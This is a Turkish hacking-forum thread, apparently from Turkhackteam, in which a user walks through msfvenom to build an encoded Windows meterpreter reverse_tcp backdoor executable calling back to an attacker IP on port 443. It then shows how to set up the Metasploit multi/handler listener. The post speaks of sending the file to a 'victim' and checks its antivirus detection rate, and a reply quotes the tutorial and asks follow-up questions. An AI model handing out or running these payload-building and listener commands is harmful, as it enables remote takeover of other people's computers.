[Metαsploit Serisi] MSFVENOM ~Cεys~

Ceys

Yaşayan Forum Efsanesi
2 Nis 2016
7,658
4,963
Orhun Nehri


MSFVENOM NEDİR

Payload oluşturmak için kullandığımız araçtır.
Kali Linux 2.0 sürümünde msfpayload olarak geçiyor fakat yeni sürümlerde msfvenom olarak değiştirme yapılmıştır.
Ben msfvenom komutu ile işlem yapacağım. Diğer komutun bir farkı yoktur.
Payloadlar exploit ile birlikte kullanılır yada tek payload oluşturarak direk kullanabiliriz.
Asıl görevleri sistemde yer edinip emirlerimizi yerine getirmektir.
3 çeşit payload vardır.

Single : Bu bağlantyı sağlar. kurban PCde bazı basit görevleri yerşne getirir.

Stagers : küçük kodlara enjekte olup kendi seçtiği payloadı çalıştıran payloaddır.

Stages : Bu hedefte tüm işlemleri gerçekleştirebilen payloaddır. Hedefe direk enjekte olur ve payload seçer.

PAYLOADIN OLUŞTURULMASI

msfvenom özelliklerini görmek için;


yazarak listeleyebiliriz.
Şimdi bu parametrelerin ne iş yaptığına bakalım..

-p, --payload <payload> Payload seçmek için kullanılır.
-l, --list [type] Payload listelemek için kullanılır.
-f, --format <format> Çıktının hangi uzantıda olacağını belirler.
-e, --encoder <encoder> Encoder seçimini belirtir.
-a, --arch <arch> payloadın mimarisini belirler.
-s, --space <length> The maximum size of the resulting payload
-b, --bad-chars <list> The list of characters to a**** example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path>
-x, --template <path>
-k, --keep
-o, --out <path>
-v, --var-name <name>
-h, --help yardım komutu




Komut satırına;

msfvenom -l payloads​

yazarak payloadları listeleyebiliriz.



Görüldüğü gibi birçok payload bulunuyor.

şimdi bir payload oluşturalım..

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Masaüstü/ceys.exe --platform windows -e x86/shikata_ga_nai -i 20​

komutunu konsola girerek bir backsoor oluşturalım.
Burda:

-p ile belirlenen hangi patform üzerinde çalışacağıdır. Biz windows belirledik.
LHOST ve LPORT ile çalışacak port ve Ip adresini yazdık.
-f ile çıktı dosyasının hangi formatta olduğudur. .exe uzantılı yaptık.
-a ile çalıaşcak sistemin özelliğini yazdık.
-o ile dosyamızı nereye kayıt etmek istediğimizi belirledik.
shikata_ga_nai encoderini kullandık.
-i ile 20 defa işlem yapmasını emrettik.



Evet artık dosyamız hazır şimdi biz bu dosyayı test edeceğiz.

me.tasploit penceresiniz açalım ve işlemleri sırasıyla yapalım..

1. gelen bağlantıları dinleyecek handlerimizi belirlemek için;

use exploit/multi/handler​

komutunu çalıştıralım.

2.Şimdi bağlantıyı sağlaaycak olan payloadı seçelim..

set PAYLOAD windows/meterpreter/reverse_tcp​

3.Hangi porttan dinleme apıyorsak onu belirtelim..


4.Gelecek olan diğer bağlantıları reddetmek için

set ExitOnSession false​

yazıyoruz. eğer kabul etmek istiyorsanız hiç bu komutu girmezsiniz.

5. son olarak bekleme moduna geçiyoruz.




bi bunu herhangi bir yere yedirmediğimiz için failled yanıtını verdi. eğer bir kurbana atarsanız orası çalışmaya ve dinleme yapmaya başlayacaktır.

Şimdi bu oluşturduğumuz virüse bir bakalım. kaçtanevirüs var.



https://www.virustotal.com/#/file/a...2f3ec6ba786527c8e857b66db184d320219/detection

sızma ve kontrol işlemleri sonraki konularda ele alınacaktır

Esen kalın ~ Cεys


 
Moderatör tarafında düzenlendi:

'Taipan

Kıdemli Üye
30 Haz 2015
3,846
73
Cεys;7944957' Alıntı:


MSFVENOM NEDİR

Payload oluşturmak için kullandığımız araçtır.
Kali Linux 2.0 sürümünde msfpayload olarak geçiyor fakat yeni sürümlerde msfvenom olarak değiştirme yapılmıştır.
Ben msfvenom komutu ile işlem yapacağım. Diğer komutun bir farkı yoktur.
Payloadlar exploit ile birlikte kullanılır yada tek payload oluşturarak direk kullanabiliriz.
Asıl görevleri sistemde yer edinip emirlerimizi yerine getirmektir.
3 çeşit payload vardır.

Single : Bu bağlantyı sağlar. kurban PCde bazı basit görevleri yerşne getirir.

Stagers : küçük kodlara enjekte olup kendi seçtiği payloadı çalıştıran payloaddır.

Stages : Bu hedefte tüm işlemleri gerçekleştirebilen payloaddır. Hedefe direk enjekte olur ve payload seçer.

PAYLOADIN OLUŞTURULMASI

msfvenom özelliklerini görmek için;



yazarak listeleyebiliriz.
Şimdi bu parametrelerin ne iş yaptığına bakalım..






Komut satırına;



yazarak payloadları listeleyebiliriz.



Görüldüğü gibi birçok payload bulunuyor.

şimdi bir payload oluşturalım..



komutunu konsola girerek bir backsoor oluşturalım.
Burda:





Evet artık dosyamız hazır şimdi biz bu dosyayı test edeceğiz.

me.tasploit penceresiniz açalım ve işlemleri sırasıyla yapalım..

1. gelen bağlantıları dinleyecek handlerimizi belirlemek için;



komutunu çalıştıralım.

2.Şimdi bağlantıyı sağlaaycak olan payloadı seçelim..



3.Hangi porttan dinleme apıyorsak onu belirtelim..



4.Gelecek olan diğer bağlantıları reddetmek için



yazıyoruz. eğer kabul etmek istiyorsanız hiç bu komutu girmezsiniz.

5. son olarak bekleme moduna geçiyoruz.





bi bunu herhangi bir yere yedirmediğimiz için failled yanıtını verdi. eğer bir kurbana atarsanız orası çalışmaya ve dinleme yapmaya başlayacaktır.

Şimdi bu oluşturduğumuz virüse bir bakalım. kaçtanevirüs var.



https://www.virustotal.com/#/file/a...2f3ec6ba786527c8e857b66db184d320219/detection

sızma ve kontrol işlemleri sonraki konularda ele alınacaktır

Esen kalın ~ Cεys



Hangi formatları kullanabileceğimizi nasıl görürüz?
Encoderlar ne kadar sağlıklı?
İşlem tekrarı yapmak ne kadar sağlıklı?
Dinleme işlemi için sadece multi/handler mi kullanılır?
Neden 443. port başka portlar kullanılamaz mı?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.